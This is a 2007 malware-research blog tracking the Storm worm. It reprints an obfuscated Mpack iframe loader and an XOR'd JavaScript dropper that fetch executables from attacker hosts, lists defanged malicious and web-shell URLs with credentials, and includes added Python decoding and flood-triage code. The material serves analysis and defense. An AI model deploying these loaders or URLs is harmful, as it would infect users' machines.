Friday, September 28, 2007

Stormworm - iframe hell.

This morning we started receiving dual-language Storm worm emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Look what they're writing about you, well you're a bitch, everyone look! here's the address
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet load (404 error); however, there is an index page, and it has JavaScript iframes pointing to:

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4


The sid=1, sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php


sid=4 is a JavaScript-encoded page that tries to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is JavaScript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php just returns a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an Mpack landing page that points to http:// superengine.cn /1278/file.php (a binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fast-flux, yet.

Space-sms.info, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1.spektor.ws and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.


Thursday, September 27, 2007

Ever Snort Pot?

For the last couple weeks DISOG has been running dual TOR Exit Nodes for the purpose of identifying malicious activities. We just made up the buzz-word SnortPot...it made a great title for this entry. Using the SNORT IDS we monitored our exit nodes.

We identified six IRC networks operating on non-standard ports. Upon further investigation we found four of them were known botnets. These are probably botnet researchers who are too chicken to use their own IPs, rather than botnet owners. The login sequence was captured by the IDS and appeared to be bot-like.

There were hundreds of SQL injection attacks on servers. High-profile agencies like NASA.gov, NIH.gov, MoneyFactory.gov, DCHealth.gov, UTCourts.gov, and VOA.gov were all targeted using what appeared to be automated scripts (the alerts were flying by so fast it was hard to keep up with the snort tail).

We registered over 3000 porn web hits in one day, with 448 name/password combinations sent as plaintext, base64-encoded HTTP Basic authentication. I Googled some of the credentials and found they had been posted online and had been indexed by Google. In many cases the credentials were posted two or more weeks ago.

Three sites that triggered the child porn rules were turned over to the authorities. All of them were located in Russia.

Our network graphs showed systems in Russia were visited more frequently than any other country. Following Russia was Japan. Around 40% of the packets were routed to those two countries.

Only a small percentage used Tor as a SOCKS 4a proxy, so that they could perform DNS queries through our systems. Most of those DNS queries were for different torrent trackers. In our experience the majority of our alerts were related to torrents or porn. It is unclear how many of these torrents were in fact porn.

18 malicious executable files were downloaded, not including 1676 CME711 (Storm Worm) binaries. It was obvious that at least one person used our exit nodes to routinely pull binaries from the Storm Servers. (Some researchers have no shame!)

As honeypots go, it was a fairly easy one to set up: download the TOR client/server software, configure it to allow exits, and configure SNORT with the SourceFire VRT and Bleeding Edge rulesets.

The downside is it's very hard to keep up with the alerts. Even with the help of BASE we had our hands full tracking down each alert. Even on a slow exit node you could see dozens of alerts per minute.

The IDS was not used to collect data on any of our visitors. We simply used it to trigger signatures that had already been developed. Several emails triggered on porn related topics, and when we identified these alerts were capturing email traffic we commented them out of our signature base to protect the privacy of those using the TOR network.

We could have easily captured all the data and performed more detailed analysis. However, we felt an IDS would give a high level idea of the malicious activities passing through the TOR network while protecting the privacy of legitimate TOR users.

After seeing the alerts TOR traffic created when leaving my exit nodes, I wonder how safe running an open proxy really is. Who is ultimately at risk when someone uses your IP address to attack a server, or to view child porn? That question hasn't yet been answered in a US court. So for now, our exit nodes have been disabled.

SnortPots are used every day by security gurus. Many of these types of honeypots sit at the edge of ISP or Corporate IP space. Be aware that any unencrypted internet traffic is visible to the casual snooper.

So what's the difference between using Snort as an IDS or as a honeypot? Nothing. I expect everyone to call their Snort sensors 'SnortPots' from now forward. :)


Sunday, September 23, 2007

Storm gearing back up

CME711, aka Stormworm, has shut down its DNS again. This likely means they are changing their tactics again.

Watch your mail box for the next round of spam and let us know what you see by posting a comment using the link below.

Thursday, September 20, 2007

Remote PHP Includes

Some of the most delightful things come via public mailing lists.

This goody brought to you by Dave Arrowsmith via the Whitestar List.


"I implimented [sic] a .htaccess Rule to 301 redirect of libwww-perl etc to google.com

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$ [NC]
RewriteRule \.*$ http://www.google.com [R,L]

and so they came..."


Probably not the greatest idea to redirect all of your attacks towards an innocent party; http://0.0.0.0/ would have worked just as well.
In the end Dave had a couple of scripts directed at what I can only assume are phpBB installs:

http:// www.kinkware.com /shop /pub /error.txt - R57Shell - password protected - user: mike pass: rico


Dave contacted Kinkware, who had this to say:

Hi,

We will investigate this issue. In the mean time can you please
provide us your IP address so we can block all traffic to
your address so that you are not affected by this.
Regards,

Tarinder Singh, Systems Administrator
Net Logistics Pty. Ltd.
http://www.netlogistics.com.au


Some others he saw but did not contact:


http:// usuarios.arnet.com.ar / larry123/safe.txt - php id script.
http:// 71.102.93.10 /WTS /bin /hak/idpitbull.txt - another php id script.
http:// www.compassolutions.com /navegacion/id.txt - another id script.
http:// www.yesevent.org /tmp/echo3 - yet another php id script.
http:// coyoteco.iespana.es /cmd.txt - ...one last php id script.
http:// www.tukangbecak.com /ban.gif - Safemode check script.
http:// sapikeren.net /yogya-carder/ indonesia/Themes/nebula/temp - Another PHP Safemode check script.


So let's recap:

Dave helped protect himself by redirecting perl user agents elsewhere.
Dave SHOULD redo his .htaccess file to keep from reflecting his attacks onto an innocent party.
You should follow suit. Furthermore, if not required, remove access to: perl, python, ruby, C(++), Java, curl, wget, socat, netcat, cryptcat, ftp, sftp, and telnet. Then drop outbound requests to ports < 1024.


Wednesday, September 19, 2007

Mpack Decode Requests

I've seen quite a rise in JavaScript decoding questions on different mailing lists. This evening one from DShield was waiting in my email box.

Turns out Dan needed to figure out what this code does:

<script language='JavaScript'>
function nbsp() {
  var t,o,l,i,j;
  var s='';
  s+='060047116101120116097116101097062060047116101120116097114101097062';
  s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';
  s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';
  s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';
  s=s+'062032';
  t='';l=s.length;i=0;
  while(i<(l-1)){
    for(j=0;j<3;j++){t+=s.charAt(i);i++;}
    if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));
    document.write(String.fromCharCode(t));t='';
  }
}
nbsp();</script><!-- c4 -->


I'm sure the Internet Storm Center (ISC) handlers get hundreds of requests like this every month. Using methods like those listed here: http://handlers.sans.org/dwesemann/decode/ I was able to turn that code into human-readable form:

</textatea></textarea><IFRAME src="http:// marcobernardoni. com /x /index.php" width=3 height=3 style="display:none"></IFRAME>
(Spaces added to protect from accidental clicks)

The HTML closing tags are there to evade techniques like the one described by Tom Liston here: http://isc.sans.org/diary.html?storyid=2268
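As an added example (not code from the post or from the ISC handlers' page), here is a static Python port of that decoding loop: it extracts the digit literals the script appends to `s`, replays the three-digits-per-character conversion including the script's odd guard, and lists the iframe source the result would write, all without running the attacker's JavaScript. It assumes every literal is appended to `s` with `s+=` or `s=s+`, as in this sample.

```python
"""Static decoder for the charcode-obfuscated Mpack loader shown above.  Added
example, not the blog's or the ISC handlers' code: it pulls the digit string the
script accumulates in `s` and replays the decoding loop in Python, so the hidden
iframe can be read without letting the attacker's JavaScript run in a browser."""
import re

# The obfuscated script from the post, its string literals rejoined on one line each.
SAMPLE = """<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';
s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';
s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';
s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';
s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}
if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}
nbsp();</script><!-- c4 -->"""

def extract_digits(script):
    """Concatenate every quoted digit literal appended to `s` (s+='..' or s=s+'..')."""
    return "".join(re.findall(r"s\s*(?:\+=|=\s*s\s*\+)\s*'(\d+)'", script))

def decode_triples(digits):
    """Replay the loop: each 3-digit group is one character code, written in order.

    The guard `if((t-unescape(0xBF))>unescape(0x00))` compares the group with 191,
    and `t-=-(unescape(0x08)+unescape(0x30))` adds the string '8'+'48', i.e. 848.
    It never fires for this sample, but it is kept so other loaders built on the
    same stub decode identically."""
    out = []
    i = 0
    while i < len(digits) - 1:
        code = int(digits[i:i + 3])
        i += 3
        if code - 191 > 0:
            code += 848
        out.append(chr(code))
    return "".join(out)

def decode_script(script):
    """Full pipeline: obfuscated script text -> the HTML it would document.write()."""
    return decode_triples(extract_digits(script))

def hidden_iframes(html):
    """List every iframe src in the decoded HTML; the 3x3 display:none frame is the hop to log."""
    return re.findall(r"<iframe[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", html, re.I)

if __name__ == "__main__":
    html = decode_script(SAMPLE)
    print(html)
    print(hidden_iframes(html))
```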

marcobernardoni.com is running on an IP out of Hong Kong, and the index page listed has an Mpack JavaScript which attempts several exploits to push file.php. Of course it's a Windows PE binary; however, it seems to be broken.

Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Status: clientTransferProhibited
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008

Registrant:
FuzioN FuzioN fuzka@bk.ru +7.9015371916
FuzioN inc
/dev/null
Moskow,babruysk,RU 117625


Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 58.65.234.161

Protect yourself: turn off JavaScript completely, or only allow it for certain sites using the Firefox NoScript extension, and keep your application patches up to date!


Thursday, September 13, 2007

Storm Fastflux Resumes

Reports came in from The Shadowserver Foundation that the Stormworm Fast Flux domains have started resolving, and additionally freenfltracker.com can be added to that list.

So, if you manage your own DNS, add a zone for freenfltracker.com and point it to 127.0.0.1.

If you're a user and get an email pointing to freenfltracker.com, delete it. Don't worry about forwarding it to us, we have enough of them.

UPDATE: Well that was quick, freenfltracker.com has been suspended thanks to the members of the Drone Armies list.

Tuesday, September 11, 2007

Other Malware

Things have been so focused on CME711 lately that I wanted to take a minute to remind everyone there are other problems we will be trying to track over the next several weeks.

Paperghost's blog, Vital Security, got me interested in the latest Skype worm. He linked to SpywareGuide, which has a great writeup. I managed to get my hands on a copy of the binary before the end of the day. I am anxious to look at it as well.

The second interesting blog post I saw today pointed me to http:// ip.btscan.com/ jdwin /webmm /mm.htm, which is encoded ASCII VBScript created to download http:// ip.btscan.com /jdwin /soft / 3e5a00d54bd4f644.exe. (Spaces added to keep from accidental clicking)

We're going to keep our eyes on storm, but we don't want to develop tunnel vision.

Saturday, September 08, 2007

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT Randy V noticed the domains started rotating the IPs less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL-related (and nicely done) and serves NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). It's not using any of the XOR'd JavaScript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football-related names, or that there will be mass infection of football-related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'


Friday, September 07, 2007

Oops, guess I pissed off Storm! :)

I started playing with the storm DNS today, not realizing how quickly I was querying the domains.

The DDoS took me offline for about 2 hours today before it was mitigated.



The DDoS was ~6 Mbps, with spikes between 10 and 12 Mbps. It consisted of both SYN packets to random ports and ICMP with the payload "abcdefghijklmnopqr".



I was able to self-mitigate down to 2-3 Mbps, but the spikes still kept me off the net. My ISP was able to completely mitigate the attack and wished me well.


I took a few minutes and ran tcpdump, mostly to figure out how to identify the ICMP payloads. In about five minutes' time I captured 1,983,749 packets generated by 1605 unique IP addresses.
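As an added example (not DISOG's tooling), here is a small Python triage script for a capture like that tcpdump run: it walks a classic pcap, flags ICMP echo requests carrying the "abcdefghijklmnopqr" payload and SYNs to random ports, and reports packet and unique-source counts per class. The capture it parses is constructed inline from documentation addresses; a real one would come from a tcpdump -w file.

```python
"""Triage a capture of the flood described above: ICMP echo requests whose payload
starts with 'abcdefghijklmnopqr' and TCP SYNs to random ports, counted per class
with the number of distinct sources.  Added example, not DISOG's own tooling; it
reads classic pcap (Ethernet/IPv4 only) and the sample capture below is constructed."""
import struct
from collections import Counter

ICMP_MARKER = b"abcdefghijklmnopqr"   # ICMP payload quoted in the post

def pcap_frames(data):
    """Yield raw link-layer frames from a classic (not pcapng) libpcap byte string."""
    magic = struct.unpack("<I", data[:4])[0]
    endian = "<" if magic in (0xA1B2C3D4, 0xA1B23C4D) else ">"
    pos = 24                                   # skip the 24-byte global header
    while pos + 16 <= len(data):
        caplen = struct.unpack(endian + "IIII", data[pos:pos + 16])[2]
        pos += 16
        yield data[pos:pos + caplen]
        pos += caplen

def classify(frame):
    """Return ('icmp_flood', src), ('syn', src, dport) or None for other traffic."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":      # IPv4 over Ethernet only
        return None
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[23]
    src = ".".join(str(b) for b in frame[26:30])
    l4 = frame[14 + ihl:]
    if proto == 1 and len(l4) >= 8 and l4[0] == 8 and l4[8:].startswith(ICMP_MARKER):
        return ("icmp_flood", src)                           # echo request + marker
    if proto == 6 and len(l4) >= 20 and (l4[13] & 0x12) == 0x02:   # SYN set, ACK clear
        return ("syn", src, struct.unpack("!H", l4[2:4])[0])
    return None

def summarize(pcap_bytes):
    """Per-class packet counts, unique-source counts and the number of SYN ports."""
    packets, sources, ports = Counter(), {}, set()
    for frame in pcap_frames(pcap_bytes):
        hit = classify(frame)
        if hit is None:
            continue
        packets[hit[0]] += 1
        sources.setdefault(hit[0], set()).add(hit[1])
        if hit[0] == "syn":
            ports.add(hit[2])
    return {"packets": dict(packets),
            "unique_sources": {k: len(v) for k, v in sources.items()},
            "syn_ports": len(ports)}

# --- constructed sample capture (documentation addresses, no real traffic) ---
def ipv4_frame(src, dst, proto, payload):
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + payload       # zero MACs, EtherType IPv4

def icmp_echo(payload):
    return struct.pack("!BBHHH", 8, 0, 0, 1, 1) + payload    # type 8 = echo request

def tcp_syn(dport):
    return struct.pack("!HHIIBBHHH", 40000, dport, 1, 0, 5 << 4, 0x02, 8192, 0, 0)

def build_pcap(frames):
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]  # linktype 1 = Ethernet
    for n, f in enumerate(frames):
        out.append(struct.pack("<IIII", n, 0, len(f), len(f)) + f)
    return b"".join(out)

SAMPLE = build_pcap(
    [ipv4_frame("203.0.113.%d" % i, "198.51.100.9", 1, icmp_echo(ICMP_MARKER)) for i in range(1, 6)]
    + [ipv4_frame("203.0.113.1", "198.51.100.9", 6, tcp_syn(p)) for p in (80, 5190, 33434)]
    + [ipv4_frame("203.0.113.7", "198.51.100.9", 1, icmp_echo(b"ping"))])   # benign echo, ignored
```

Calling summarize(SAMPLE) on the constructed capture reports 5 flood packets from 5 sources, 3 SYNs from one source to 3 distinct ports, and nothing for the benign echo.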

This attack was just enough to get my attention. The network's full power was not flexed and I was back online fairly quickly. He could have made it much worse for me. This guy is experienced, there is no question; frankly, I'm excited!

NOTE: The DDoS attack was on my honeypot IP, not the website.

Thursday, September 06, 2007

fncarp.com

A friend just alerted me: the domain fncarp.com is now suspended.

$ whois fncarp.com
...
Status:SUSPENDED
Note: This Domain Name is Suspended. In this status the domain name
is InActive and will not function.

CME711 (Storm) using TOR ruse

This morning I woke up to the latest storm page...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width="500">
<tr><td><img src="img/tor1.gif"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan="2">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href="tor.exe"><img src="img/tor2.png" border=0></a>
</td></tr>
</table>
</body>
</html>
The text is a word-for-word cut and paste from the official TOR website, tor.eff.org.

In summary, they're betting on more clicks by offering The Onion Router (TOR) proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe are resolving while video.exe, setup.exe and labor.exe no longer resolve.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/


Storm, meet Danchev - and SMTP Honeypots.

Dancho Danchev has been playing around with storm's fastflux and created some neat pictures showing how dynamic this network actually is.

His blog post is located here: http://ddanchev.blogspot.com/2007/09/storm-worms-fast-flux-networks.html

DISOG has been running internal SMTP honeypots for Stormworm since around August 15th. Since that date we've captured over 22,000 unique IP addresses!

Today was a slow day, 1651 unique IPs in just under 6000 emails. Since September 1st, we've managed to capture over 4685 unique IP addresses.

(Note: many of the IPs have been cleaned already; they are posted here for historical purposes only)


Tuesday, September 04, 2007

Stormworm DNS Failures

Starting just before noon (UTC) Sept 4th our sensors indicated a significant drop in traffic from the storm botnet as DNS for 5 of the domains started failing.

There has been a total DNS Blackout on these five domains since 1200 UTC:

tibeam.com, snbane.com, snlilac.com, fncarp.com, and ltbrew.com

The following domains are still resolving:

kqfloat.com, yxbegan.com, qavoter.com, ptowl.com, wxtaste.com, eqcorn.com, and bnably.com.

(For those of you blindly clicking links, don't visit those sites...nothing good will come of it)

UPDATE: The servers are stable again, all domains are resolving as of 1400 UTC.

Monday, September 03, 2007

Latest Stormworm sharing Labor Day greetings

The CME-711 (Stormworm) peers are now spreading Windows executable files with the following names:

file.php, video.exe, setup.exe, sony.exe and labor.exe
Sony.exe and labor.exe are new over the last 48 hours. Be sure to update your IDS Signatures.

Labor.exe is in reference to the Labor Day holiday:

Our Greeting System has a Labor Day card for you, go here to pick it up:

http:// yahoo.com /07cards/ greet1?[random hex string]

We're getting a new file on each download attempt again:


Our MD5 list has been updated, identifying the 26,200+ binaries we've captured. You can view it here.


Saturday, September 01, 2007

Peacomm gets scrappy with Kaspersky

This was sent to us by a reader earlier this week:
<iframe src="http://kqfloat.com/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
I spent a few minutes looking at the code this evening...
It downloads XOR'd JavaScript (like usual) ->

function xor_str(plain_str, xor_key){
  var xored_str = "";
  for (var i = 0 ; i < plain_str.length; ++i)
    xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
  return xored_str;
}
function kaspersky(suck,dick){};
function kaspersky2(suck_dick,again){};
var plain_str =
....
....
SNIP
....
....
var xored_str = xor_str(plain_str, 200); eval(xored_str);

which downloads -> 'http:// fncarp.com /sony.exe' using the user agent:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)

Sony.exe appears to be static, just like video.exe and setup.exe (c05893a656b54164fb486028309bd89e)


DISOG Site Changes

Since our site is mostly a news/blogging site, we've changed things around and are now using a Blogger-style layout.

I prefer the black background, and hope you enjoy it as well.

I tried to make sure timestamps and text formatted properly during the conversion, however there may still be bugs. Please let me know via email if you see anything that needs fixing.

Peed Goes Static

For the last few days, the Peed servers have stopped rotating their malware. They are sticking with the static MD5 sum of c05893a656b54164fb486028309bd89e.

Most of the major Antivirus vendors are aware of the file:
File setup.exe received on 09.01.2007 17:54:57 (CET)
Antivirus           Version         Last Update   Result
AhnLab-V3           2007.9.1.0      2007.09.01    Win32/Zhelatin.worm.138240.B
AntiVir             7.4.1.66        2007.08.31    Worm/Zhelatin.HJ
Authentium          4.93.8          2007.09.01    W32/Tibs.XB
Avast               4.7.1029.0      2007.09.01    Win32:Tibs-BCY
AVG                 7.5.0.484       2007.08.31    Generic6.WTZ
BitDefender         7.2             2007.09.01    Trojan.Peed.PB
CAT-QuickHeal       9.00            2007.09.01    -
ClamAV              0.91.2          2007.09.01    -
DrWeb               4.33            2007.09.01    BackDoor.Groan
eSafe               7.0.15.0        2007.08.29    -
eTrust-Vet          31.1.5100       2007.08.31    Win32/Pecoan
Ewido               4.0             2007.09.01    -
FileAdvisor         1               2007.09.01    -
Fortinet            3.11.0.0        2007.09.01    W32/Tibs@mm
F-Prot              4.3.2.48        2007.08.31    W32/Tibs.XB
F-Secure            6.70.13030.0    2007.08.31    Email-Worm.Win32.Zhelatin.hj
Ikarus              T3.1.1.12       2007.09.01    Backdoor.Win32.Agent.amd
Kaspersky           4.0.2.24        2007.09.01    Email-Worm.Win32.Zhelatin.hj
McAfee              5110            2007.08.31    W32/Nuwar@MM
Microsoft           1.2803          2007.09.01    -
NOD32v2             2495            2007.09.01    -
Norman              5.80.02         2007.08.31    W32/Tibs.dam
Panda               9.0.0.4         2007.09.01    Trj/Alanchum.MV
Prevx1              V2              2007.09.01    -
Rising              19.38.52.00     2007.09.01    Worm.Mail.Win32.Zhelatin.dau
Sophos              4.21.0          2007.09.01    W32/Bagz-I
Sunbelt             2.2.907.0       2007.08.31    Trojan-Downloader.Win32.Tibs.jy
Symantec            10              2007.09.01    Trojan Horse
TheHacker           6.1.9.175       2007.08.31    W32/Zhelatin.hj
VBA32               3.12.2.3        2007.09.01    Email-Worm.Win32.Zhelatin.hj
VirusBuster         4.3.26:9        2007.09.01    I-Worm.Zhelatin.AA
Webwasher-Gateway   6.0.1           2007.08.31    Worm.Zhelatin.HJ

Additional information
File size: 138240 bytes
MD5: c05893a656b54164fb486028309bd89e
SHA1: 8ad506547710d61a6ac0613fdb1d290911f8e600
(Virustotal Results, http://www.virustotal.com)
As you can see, a select few still miss it, so please be careful clicking on those links in email or blog posts!


UPDATE: A closer look at our binaries over the last few days shows that we're still getting random binaries, but only a couple hundred a day, instead of several thousand. By far the most common binary appears to be c05893a656b54164fb486028309bd89e.


Targeted Storm

This morning I woke up to half a dozen targeted Storm Greetings in my mailbox. They looked like this:
Movie-quality postcard for (My Email Account Name)

Class mate(yexnjcegftuory@mittromney.com) has created Movie-quality postcard for you (My Email Account Name)
at lavacards.com.

To see your custom Movie-quality postcard, simply click on the following link:

http://xxx.xxx.xxx.xxx/

Send a FREE greeting card from lavacards.com whenever you want by visiting us at:
This service is provided and hosted by lavacards.com.

These are the first to include the account name used in the email. People may believe the authenticity of these emails because they do appear more targeted.
